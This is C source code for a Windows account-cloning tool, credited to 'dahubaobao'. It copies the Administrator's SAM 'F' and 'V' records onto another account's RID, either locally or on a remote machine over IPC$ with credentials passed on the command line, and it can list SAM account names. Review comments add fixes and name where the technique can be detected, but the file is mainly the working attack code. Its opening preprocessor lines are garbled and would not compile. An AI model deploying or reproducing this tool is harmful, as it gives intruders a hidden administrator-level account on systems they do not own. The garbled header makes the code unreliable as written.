# Define debugmsg
# Include <windows. h>
# Include <winnetwk. h>
# Include <tchar. h>
# Include <stdio. h>
# Pragma comment (Lib, "MIP. lib ")
# Define debug (x) outputdebugstring (text (x ))
# Define erron getlasterror ()
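#define ALLOCBUFFER      (1024 * 10)   /* bytes reserved for each SAM "F"/"V" value */
#define REMOTE_HOST_LEN  20            /* TCHARs per IPCINFO field, NUL included */
#define SET_CONNECT_IPC  0             /* open an IPC$ session and use the remote registry */
#define NOT_CONNECT_IPC  1             /* operate on the local registry only */

/*
 * Connection settings shared by the clone/list routines.
 * NOTE(review): isipc is a one-bit field whose zero value is SET_CONNECT_IPC,
 * so a zero-initialised IPCINFO means "remote" unless the caller sets it.
 */
typedef struct ipcinfo
{
    TCHAR remoteip[REMOTE_HOST_LEN];    /* remote host (IP address or name) */
    TCHAR remoteuser[REMOTE_HOST_LEN];  /* account used for the IPC$ session */
    TCHAR remotepass[REMOTE_HOST_LEN];  /* its password, clear text, copied from argv */
    UINT  isipc : 1;                    /* SET_CONNECT_IPC or NOT_CONNECT_IPC */
} IPCINFO, *PIPCINFO, *LPIPCINFO;

TCHAR IPC[100] = {0};        /* UNC name of the IPC$ share, filled by connipc() */
TCHAR name[50][100] = {0};   /* subkey names collected by openkey(); at most 50 of 99 TCHARs */
DWORD keyn = 0;              /* number of entries of name[] that openkey() filled */

/* Copy the Administrator SAM record over another account. */
BOOL cloneuser(IN TCHAR *cloneuser, IN LPIPCINFO lpipcinfo);
BOOL openkey(IN TCHAR *openkey, IN HKEY connhkey);   /* enumerate the subkeys of one key into name[] */
BOOL viewuser(IN TCHAR *viewkey);                    /* print one SAM "Names" entry */
BOOL listuser(IN LPIPCINFO lpipcinfo);               /* list SAM account names, local or remote */
BOOL connipc(IN LPIPCINFO lpipcinfo);                /* open the IPC$ session */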
// Handle errors
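/*
 * Report a Win32 error code in readable form.
 *
 * funcname: name of the failing API call, used as the message prefix.
 * errorid:  Win32 error code. Registry and WNet functions return their error
 *           code directly and do not set the thread's last error, so callers
 *           should pass the return value rather than GetLastError().
 * msgflag:  TRUE  -> write to stderr
 *           FALSE -> write to the debugger via OutputDebugString
 *
 * Fixes over the original listing: the buffer used for the debugger path is
 * written with a bounded _sntprintf instead of _stprintf (a long system
 * message could overrun the MAX_PATH array); a failed FormatMessage no
 * longer passes a NULL pointer to "%s"; FORMAT_MESSAGE_IGNORE_INSERTS keeps
 * system messages that contain "%1"-style inserts from being expanded with
 * no arguments. OutputDebugString is called directly because the file's
 * DEBUG(x) macro wraps its argument in TEXT(x), which only works for literals.
 */
static void messageerror(const TCHAR *funcname, DWORD errorid, BOOL msgflag)
{
    TCHAR *message = NULL;
    TCHAR msgerror[MAX_PATH] = {0};
    const TCHAR *description;

    if (funcname == NULL)
        funcname = TEXT("(unknown function)");

    /* FORMAT_MESSAGE_ALLOCATE_BUFFER makes the system allocate 'message';
     * it must be released with LocalFree(). A zero return leaves it NULL. */
    if (FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM |
                          FORMAT_MESSAGE_IGNORE_INSERTS,
                      NULL, errorid, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
                      (LPTSTR)&message, 0, NULL) == 0)
        message = NULL;

    description = (message != NULL) ? message : TEXT("(no system description)");

    if (msgflag) {
        _ftprintf(stderr, TEXT("%s GetLastError reports %lu and %s\n"),
                  funcname, (unsigned long)errorid, description);
    } else {
        _sntprintf(msgerror, MAX_PATH - 1, TEXT("%s GetLastError reports %lu and %s\n"),
                   funcname, (unsigned long)errorid, description);
        msgerror[MAX_PATH - 1] = TEXT('\0'); /* _sntprintf does not guarantee termination */
        OutputDebugString(msgerror);
    }

    if (message != NULL)
        LocalFree(message);
}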
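/*
 * Copy the built-in Administrator's "F" and "V" SAM values onto the account
 * whose key is SAM\Domains\Account\Users\00000<cloneuser>.
 *
 * Both keys are opened on the same registry root: the local machine, or the
 * remote machine reached through an IPC$ session plus RegConnectRegistry when
 * lpipcinfo->isipc == SET_CONNECT_IPC.
 *
 * cloneuser: hex RID suffix (1..5 characters) of the target account. main()
 *            already enforces the length; it is re-checked here so the key
 *            path cannot overflow when called from elsewhere.
 * lpipcinfo: connection settings; the remote* fields are only read in remote mode.
 * Returns TRUE on success, FALSE on any failure. Failures are described on
 * stderr when DEBUGMSG is defined.
 *
 * Fixes over the original listing:
 *  - the target key was opened on the local HKEY_LOCAL_MACHINE even in remote
 *    mode, so a remote clone would have written the remote Administrator's
 *    record into the *local* SAM; it is now opened on connhkey;
 *  - machinename was 20 TCHARs, too small for "\\" + a 19-character host;
 *  - the remote root handle from RegConnectRegistry was never closed;
 *  - errors were reported through GetLastError(), which Reg* functions do not
 *    set; the returned code is reported instead;
 *  - the source key is opened with KEY_QUERY_VALUE and the target with
 *    KEY_SET_VALUE rather than KEY_ALL_ACCESS, and the value types read back
 *    are checked to be REG_BINARY before being written.
 *
 * NOTE(review): the SAM hive is not normally accessible to administrators,
 * so this presumably has to run as SYSTEM (or the remote side must grant it);
 * confirm before relying on it. "F" and "V" are the SAM's fixed- and
 * variable-length account records (presumably including the credential
 * material, which is why the copied account behaves as Administrator).
 * Writes to SAM\Domains\Account\Users\<RID>\F and \V are the detection point
 * for this "account clone" persistence technique.
 */
BOOL cloneuser(IN TCHAR *cloneuser, IN LPIPCINFO lpipcinfo)
{
    HKEY connhkey = NULL, srchkey = NULL, clonehkey = NULL;
    LPBYTE lpdataf = NULL, lpdatav = NULL;
    TCHAR clonesid[100] = {0};
    TCHAR machinename[REMOTE_HOST_LEN + 3] = {0}; /* "\\" + host + NUL */
    DWORD lpsizef = ALLOCBUFFER, lpsizev = ALLOCBUFFER;
    DWORD typef = REG_NONE, typev = REG_NONE;
    LONG rc;
    BOOL ok = FALSE;

    if (cloneuser == NULL || lpipcinfo == NULL)
        return FALSE;
    if (_tcslen(cloneuser) == 0 || _tcslen(cloneuser) > 5)
        return FALSE;

    if (lpipcinfo->isipc == SET_CONNECT_IPC) {
        _tprintf(TEXT("connect remote registry...\n"));
        if (!connipc(lpipcinfo))
            goto cleanup;

        _sntprintf(machinename, REMOTE_HOST_LEN + 2, TEXT("\\\\%s"), lpipcinfo->remoteip);
        machinename[REMOTE_HOST_LEN + 2] = TEXT('\0');

        rc = RegConnectRegistry(machinename, HKEY_LOCAL_MACHINE, &connhkey);
        if (rc != ERROR_SUCCESS) {
#ifdef DEBUGMSG
            messageerror(TEXT("RegConnectRegistry()"), (DWORD)rc, TRUE);
#endif
            goto cleanup;
        }
    } else {
        connhkey = HKEY_LOCAL_MACHINE;
    }

    lpdataf = (LPBYTE)malloc(ALLOCBUFFER);
    lpdatav = (LPBYTE)malloc(ALLOCBUFFER);
    if (lpdataf == NULL || lpdatav == NULL) {
#ifdef DEBUGMSG
        messageerror(TEXT("malloc()"), ERROR_NOT_ENOUGH_MEMORY, TRUE);
#endif
        goto cleanup;
    }

    /* Target key path: "00000" + suffix, at most 5 extra characters (checked above). */
    _sntprintf(clonesid, 99, TEXT("SAM\\Domains\\Account\\Users\\00000%s"), cloneuser);
    clonesid[99] = TEXT('\0');

    /* Source: the built-in Administrator account, RID 500 == 0x1F4. */
    rc = RegOpenKeyEx(connhkey, TEXT("SAM\\Domains\\Account\\Users\\000001F4"),
                      0, KEY_QUERY_VALUE, &srchkey);
    if (rc != ERROR_SUCCESS) {
#ifdef DEBUGMSG
        messageerror(TEXT("RegOpenKeyEx()"), (DWORD)rc, TRUE);
#endif
        goto cleanup;
    }

    rc = RegQueryValueEx(srchkey, TEXT("F"), NULL, &typef, lpdataf, &lpsizef);
    if (rc != ERROR_SUCCESS || typef != REG_BINARY) {
#ifdef DEBUGMSG
        messageerror(TEXT("RegQueryValueEx(F)"), (DWORD)rc, TRUE);
#endif
        goto cleanup;
    }

    rc = RegQueryValueEx(srchkey, TEXT("V"), NULL, &typev, lpdatav, &lpsizev);
    if (rc != ERROR_SUCCESS || typev != REG_BINARY) {
#ifdef DEBUGMSG
        messageerror(TEXT("RegQueryValueEx(V)"), (DWORD)rc, TRUE);
#endif
        goto cleanup;
    }

    /* Target: same root as the source (local or remote). */
    rc = RegOpenKeyEx(connhkey, clonesid, 0, KEY_SET_VALUE, &clonehkey);
    if (rc != ERROR_SUCCESS) {
#ifdef DEBUGMSG
        messageerror(TEXT("RegOpenKeyEx()"), (DWORD)rc, TRUE);
#endif
        goto cleanup;
    }

    rc = RegSetValueEx(clonehkey, TEXT("F"), 0, REG_BINARY, lpdataf, lpsizef);
    if (rc != ERROR_SUCCESS) {
#ifdef DEBUGMSG
        messageerror(TEXT("RegSetValueEx(F)"), (DWORD)rc, TRUE);
#endif
        goto cleanup;
    }

    rc = RegSetValueEx(clonehkey, TEXT("V"), 0, REG_BINARY, lpdatav, lpsizev);
    if (rc != ERROR_SUCCESS) {
#ifdef DEBUGMSG
        messageerror(TEXT("RegSetValueEx(V)"), (DWORD)rc, TRUE);
#endif
        goto cleanup;
    }

    _tprintf(TEXT("clone user success\n"));
    ok = TRUE;

cleanup:
    free(lpdataf);
    free(lpdatav);
    if (srchkey != NULL)
        RegCloseKey(srchkey);
    if (clonehkey != NULL)
        RegCloseKey(clonehkey);
    /* Only a handle obtained from RegConnectRegistry needs closing; the
     * predefined HKEY_LOCAL_MACHINE must not be. */
    if (connhkey != NULL && connhkey != HKEY_LOCAL_MACHINE)
        RegCloseKey(connhkey);
    return ok;
}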
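/*
 * Enumerate the subkeys of 'openkey' under 'connhkey' into the global name[]
 * table and set the global keyn to the number of entries stored.
 *
 * openkey:  registry path relative to connhkey.
 * connhkey: root handle (HKEY_LOCAL_MACHINE or a RegConnectRegistry handle).
 * Returns TRUE when enumeration reached ERROR_NO_MORE_ITEMS (or the table is
 * full, which is reported on stderr); FALSE on an open or enumeration error.
 *
 * Fixes over the original listing: names are copied into name[keyn] with a
 * bound (the original concatenated every name onto the first row and had no
 * limit on keyn); the size passed to RegEnumKeyEx is a TCHAR count, not a
 * byte count; keyn now counts exactly the filled rows, so listuser() no
 * longer has to subtract one; the key is opened with KEY_ENUMERATE_SUB_KEYS
 * instead of KEY_ALL_ACCESS; the per-iteration Sleep() is gone.
 */
BOOL openkey(IN TCHAR *openkey, IN HKEY connhkey)
{
    HKEY hkey = NULL;
    const DWORD maxnames = (DWORD)(sizeof(name) / sizeof(name[0]));
    const DWORD namelen = (DWORD)(sizeof(name[0]) / sizeof(name[0][0]));
    LONG rc;

    if (openkey == NULL || connhkey == NULL)
        return FALSE;

    rc = RegOpenKeyEx(connhkey, openkey, 0, KEY_ENUMERATE_SUB_KEYS, &hkey);
    if (rc != ERROR_SUCCESS) {
#ifdef DEBUGMSG
        messageerror(TEXT("RegOpenKeyEx()"), (DWORD)rc, TRUE);
#endif
        return FALSE;
    }

    keyn = 0;
    for (;;) {
        TCHAR tempname[100] = {0};
        DWORD tempsize = (DWORD)(sizeof(tempname) / sizeof(tempname[0])); /* TCHARs */

        if (keyn >= maxnames) {
            _ftprintf(stderr, TEXT("too many subkeys, listing truncated at %lu\n"),
                      (unsigned long)maxnames);
            break;
        }

        rc = RegEnumKeyEx(hkey, keyn, tempname, &tempsize, NULL, NULL, NULL, NULL);
        if (rc == ERROR_NO_MORE_ITEMS)
            break;
        if (rc != ERROR_SUCCESS) {
#ifdef DEBUGMSG
            messageerror(TEXT("RegEnumKeyEx()"), (DWORD)rc, TRUE);
#endif
            RegCloseKey(hkey);
            return FALSE;
        }

        _tcsncpy(name[keyn], tempname, namelen - 1);
        name[keyn][namelen - 1] = TEXT('\0');
        keyn++;
    }

    RegCloseKey(hkey);
    return TRUE;
}

/*
 * Print, in hex, the type field of the default value of 'viewkey' under 'root'.
 * The listing uses this on SAM\Domains\Account\Users\Names\<account> entries;
 * the type field there presumably carries the account's RID, which is why it
 * is printed rather than the data - confirm against the SAM layout.
 * The key is opened read-only. Returns TRUE on success.
 */
static BOOL viewuser_under(HKEY root, const TCHAR *viewkey)
{
    HKEY hkey = NULL;
    DWORD regtype = 0;
    LONG rc;

    if (root == NULL || viewkey == NULL)
        return FALSE;

    rc = RegOpenKeyEx(root, viewkey, 0, KEY_QUERY_VALUE, &hkey);
    if (rc != ERROR_SUCCESS) {
#ifdef DEBUGMSG
        messageerror(TEXT("RegOpenKeyEx()"), (DWORD)rc, TRUE);
#endif
        return FALSE;
    }

    /* NULL data/size pointers: only the value type is requested. */
    rc = RegQueryValueEx(hkey, NULL, NULL, &regtype, NULL, NULL);
    if (rc != ERROR_SUCCESS) {
#ifdef DEBUGMSG
        messageerror(TEXT("RegQueryValueEx()"), (DWORD)rc, TRUE);
#endif
        RegCloseKey(hkey);
        return FALSE;
    }

    _tprintf(TEXT("%x\n"), (unsigned)regtype);
    RegCloseKey(hkey);
    return TRUE;
}

/*
 * Print the type of the default value of 'viewkey' under the local
 * HKEY_LOCAL_MACHINE. Kept for callers of the original interface; listuser()
 * uses viewuser_under() so that remote listings query the remote registry.
 */
BOOL viewuser(IN TCHAR *viewkey)
{
    return viewuser_under(HKEY_LOCAL_MACHINE, viewkey);
}

/*
 * List the account names under SAM\Domains\Account\Users\Names, each followed
 * by "==> " and the hex value type of its entry, on the local machine or on
 * the remote machine when lpipcinfo->isipc == SET_CONNECT_IPC.
 *
 * Fixes over the original listing: the per-account key was looked up on the
 * local registry even in remote mode; the account name was passed to
 * wsprintf() as the *format string* (an account named with "%" sequences,
 * which an operator does not control on a remote host, would corrupt the
 * stack or the output) - it is now printed through "%s"; the path buffer was
 * 100 TCHARs for a 32-character prefix plus a 99-character name; the remote
 * root handle is now closed on every path.
 * Returns TRUE when every entry was printed.
 */
BOOL listuser(IN LPIPCINFO lpipcinfo)
{
    HKEY connhkey = NULL;
    TCHAR machinename[REMOTE_HOST_LEN + 3] = {0}; /* "\\" + host + NUL */
    TCHAR regbuffer[256] = {0};
    TCHAR namesroot[] = TEXT("SAM\\Domains\\Account\\Users\\Names");
    BOOL ok = FALSE;
    LONG rc;
    DWORD n;

    if (lpipcinfo == NULL)
        return FALSE;

    if (lpipcinfo->isipc == SET_CONNECT_IPC) {
        _tprintf(TEXT("connect remote registry...\n"));
        if (!connipc(lpipcinfo))
            return FALSE;

        _sntprintf(machinename, REMOTE_HOST_LEN + 2, TEXT("\\\\%s"), lpipcinfo->remoteip);
        machinename[REMOTE_HOST_LEN + 2] = TEXT('\0');

        rc = RegConnectRegistry(machinename, HKEY_LOCAL_MACHINE, &connhkey);
        if (rc != ERROR_SUCCESS) {
#ifdef DEBUGMSG
            messageerror(TEXT("RegConnectRegistry()"), (DWORD)rc, TRUE);
#endif
            return FALSE;
        }
    } else {
        connhkey = HKEY_LOCAL_MACHINE;
    }

    if (!openkey(namesroot, connhkey))
        goto cleanup;

    for (n = 0; n < keyn; n++) {
        _sntprintf(regbuffer, 255, TEXT("%s\\%s"), namesroot, name[n]);
        regbuffer[255] = TEXT('\0');

        /* Account names are data, never a format string. */
        _tprintf(TEXT("%s==> "), name[n]);

        if (!viewuser_under(connhkey, regbuffer))
            goto cleanup;
    }
    ok = TRUE;

cleanup:
    if (connhkey != NULL && connhkey != HKEY_LOCAL_MACHINE)
        RegCloseKey(connhkey);
    return ok;
}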
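/*
 * Open an IPC$ session to lpipcinfo->remoteip with lpipcinfo->remoteuser /
 * remotepass, so that RegConnectRegistry can reach the remote registry.
 * The UNC name "\\host\IPC$" is stored in the global IPC so main() can
 * cancel the session with WNetCancelConnection2 later.
 * Returns TRUE on success; the WNet error code is reported when DEBUGMSG is
 * defined.
 *
 * Fixes over the original listing: the NETRESOURCE is zeroed before the four
 * fields are set; the _sntprintf limit is a TCHAR count rather than
 * sizeof(IPC) in bytes (twice the array in a UNICODE build); the buffer is
 * explicitly terminated; the WNet return value is reported instead of
 * GetLastError().
 *
 * NOTE(review): the credentials arrive from argv (see main), so the password
 * is visible in the process command line and stays in clear text in memory
 * for the lifetime of the program.
 */
BOOL connipc(IN LPIPCINFO lpipcinfo)
{
    NETRESOURCE nr;
    const size_t ipclen = sizeof(IPC) / sizeof(IPC[0]); /* TCHARs */
    DWORD rc;

    if (lpipcinfo == NULL)
        return FALSE;

    memset(&nr, 0, sizeof(nr));

    _sntprintf(IPC, ipclen - 1, TEXT("\\\\%s\\IPC$"), lpipcinfo->remoteip);
    IPC[ipclen - 1] = TEXT('\0');

    nr.dwType = RESOURCETYPE_ANY;
    nr.lpLocalName = NULL;   /* no drive letter: a plain IPC$ session */
    nr.lpRemoteName = IPC;
    nr.lpProvider = NULL;    /* let the system pick the provider */

    rc = WNetAddConnection2(&nr, lpipcinfo->remotepass, lpipcinfo->remoteuser, 0);
    if (rc != NO_ERROR) {
#ifdef DEBUGMSG
        messageerror(TEXT("WNetAddConnection2()"), rc, TRUE);
#endif
        return FALSE;
    }
    return TRUE;
}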
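/* Print the accepted command lines. */
static void usage(void)
{
    _tprintf(TEXT("usage:\n"));
    _tprintf(TEXT("  -c <rid>                      clone Administrator onto local account 00000<rid>\n"));
    _tprintf(TEXT("  -c <rid> <ip> <user> <pass>   same, on the remote machine via IPC$\n"));
    _tprintf(TEXT("  -l                            list local SAM account names\n"));
    _tprintf(TEXT("  -l <ip> <user> <pass>         list remote SAM account names\n"));
}

/*
 * Copy one argv value into a REMOTE_HOST_LEN-sized IPCINFO field.
 * Returns FALSE (after a message) when the value would be truncated: a
 * silently cut user name or password only produces a confusing logon error
 * on the remote side.
 */
static BOOL copy_field(TCHAR dst[REMOTE_HOST_LEN], const TCHAR *src, const TCHAR *what)
{
    if (src == NULL || _tcslen(src) >= REMOTE_HOST_LEN) {
        _ftprintf(stderr, TEXT("%s must be shorter than %d characters\n"),
                  what, (int)REMOTE_HOST_LEN);
        return FALSE;
    }
    _tcsncpy(dst, src, REMOTE_HOST_LEN - 1);
    dst[REMOTE_HOST_LEN - 1] = TEXT('\0');
    return TRUE;
}

/*
 * Entry point. See usage() for the accepted forms.
 *
 * Returns 0 on success and 1 on a usage error or when the requested
 * operation failed (the original always returned 0, which made the result
 * invisible to a calling script).
 *
 * Fixes over the original listing: isipc is set to NOT_CONNECT_IPC up front,
 * because the zero value of the bit-field is SET_CONNECT_IPC and an
 * unrecognised command line previously fell through to
 * WNetCancelConnection2 on an empty name; the IPC$ session is now cancelled
 * even when the clone/list step failed; argv values that do not fit the
 * IPCINFO fields are rejected instead of truncated.
 *
 * NOTE(review): credentials are taken from the command line, so they are
 * visible to any process that can read this one's command line; the local
 * copy is scrubbed before exit, argv itself is not. In a UNICODE build the
 * entry point presumably needs to be _tmain for argv to be TCHAR - confirm
 * against the project settings.
 */
int main(int argc, TCHAR *argv[])
{
    IPCINFO ipcinfo = {0};
    BOOL ok = FALSE;
    int rc = 0;

    ipcinfo.isipc = NOT_CONNECT_IPC;

    if (argc == 1) {
        _tprintf(TEXT("code by dahubaobao\n"));
        usage();
        return 0;
    }

    if (_tcsicmp(argv[1], TEXT("-c")) == 0 && (argc == 3 || argc == 6)) {
        if (_tcslen(argv[2]) > 5) {
            _tprintf(TEXT("User Sid no larger than \"5\"\n"));
            return 1;
        }
        if (argc == 6) {
            ipcinfo.isipc = SET_CONNECT_IPC;
            if (!copy_field(ipcinfo.remoteip, argv[3], TEXT("host")) ||
                !copy_field(ipcinfo.remoteuser, argv[4], TEXT("user name")) ||
                !copy_field(ipcinfo.remotepass, argv[5], TEXT("password")))
                return 1;
        }
        ok = cloneuser(argv[2], &ipcinfo);
    } else if (_tcsicmp(argv[1], TEXT("-l")) == 0 && (argc == 2 || argc == 5)) {
        if (argc == 5) {
            ipcinfo.isipc = SET_CONNECT_IPC;
            if (!copy_field(ipcinfo.remoteip, argv[2], TEXT("host")) ||
                !copy_field(ipcinfo.remoteuser, argv[3], TEXT("user name")) ||
                !copy_field(ipcinfo.remotepass, argv[4], TEXT("password")))
                return 1;
        }
        ok = listuser(&ipcinfo);
    } else {
        usage();
        return 1;
    }

    if (!ok)
        rc = 1;

    /* Tear down the IPC$ session that connipc() opened. IPC is still empty
     * when connipc() was never reached, so there is nothing to cancel then. */
    if (ipcinfo.isipc == SET_CONNECT_IPC && IPC[0] != TEXT('\0')) {
        DWORD werr = WNetCancelConnection2(IPC, 0, TRUE);
        if (werr != NO_ERROR) {
#ifdef DEBUGMSG
            messageerror(TEXT("WNetCancelConnection2()"), werr, TRUE);
#endif
            rc = 1;
        }
    }

    /* Scrub the local copy of the password; SecureZeroMemory is not
     * optimised away like a plain memset before return would be. */
    SecureZeroMemory(ipcinfo.remotepass, sizeof(ipcinfo.remotepass));
    return rc;
}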
Source: dahu_baobao